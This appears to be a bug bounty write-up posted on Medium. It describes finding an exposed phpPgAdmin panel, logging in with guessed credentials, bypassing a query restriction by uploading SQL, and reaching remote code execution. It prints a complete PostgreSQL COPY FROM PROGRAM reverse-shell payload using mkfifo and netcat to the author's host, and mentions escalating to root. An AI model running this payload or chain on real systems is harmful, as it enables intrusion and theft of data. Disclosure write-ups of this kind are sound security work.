Bug Bounty: “My Remote Code Execution”

First Step:

In first, i found my subdomain using Amass tool.

After i used ffuf tool for brute force the directories and i found an Improper access control: https://subdomain.xxx.com/phppgadmin

There was a page with need to submit credentials, user and password.

I tried some combination of user/password with googling, and thanks to google i found it. And you know? I was IN.

This was my reaction !

Access Database:

Now i got FULL access on their database, i got all password and username. Admin password and other user passoword. That’s was awesome.

But i never tried to crack some password. I tried to get a reverse shell.

SQL Injection:

In this moment i got the GUI of phppgadmin and i can execute SQL query.

But wait.. No i can’t! Because query statement block my injection, and only from localhost i can execute the query.

SQL Injection blocked!

SQL Injection Bypass:

At this point, after too much hours, i notice that i can bypass the query statement just uploading the query via upload button, and you know? The query was correctly execute!!

Successfully SQL bypass statement.

You can find this exploit in exploit-db with my name: https://www.exploit-db.com/exploits/49736 .

This is the result:

RCE

RCE done!

Remote Code Execution:

Ok now that the RCE was DONE! I was trying to get and iShell (Interactive shell) or reverse shell. So i tryind to find with my RCE if there is NC (netcat) on their kernel installed , with command: which nc and the output was /usr/bin/nc.

Second reaction!

At this point i just change the payload with my IP and PORT, my payload was: COPY cmd_exec FROM PROGRAM ‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [$MyIp] [$MyPort]>/tmp/f’;

And i WAS IN! Got localhost! But i was default user “postgres” .

I notice with “uname -a” that the kernel was vulnerable with a local privilege escalation exploit.

And i notice i can escape from postgres because runs under root.

So i could get root!

Thanks guys! Follow me on Twitter: @0xJin

In the final this was reported:

Resolved!
Buy me a coffe if you like it :)

--

--

--

| eCPTX | C|EH Master | CompTIA Security + | eJPT |

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

KDL Airdrop Lottery results

{UPDATE} Fantasy Manager Soccer 2020 Hack Free Resources Generator

Bitmart seeks restraining order to prevent hackers from selling fake BSV

Reviewsed.com: Changing The Spectrum Of The Cyber World

Reviewsed.com

{UPDATE} Club Hottie Hack Free Resources Generator

A major breakthrough in Web 3.0 — Data Monetization

CoolStar contacted pattern_f to check whether he likes to share his exploit details: iOS 14.6–14.8

Gotomeeting Full Desktop App For Mac Osx

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
0xJin

0xJin

| eCPTX | C|EH Master | CompTIA Security + | eJPT |

More from Medium

Making Sense Of The Dirty Pipe Vulnerability (CVE-2022–0847) — RedHunt Labs

Tryhackme-IDE

[Cryptohack] Logon Zero write up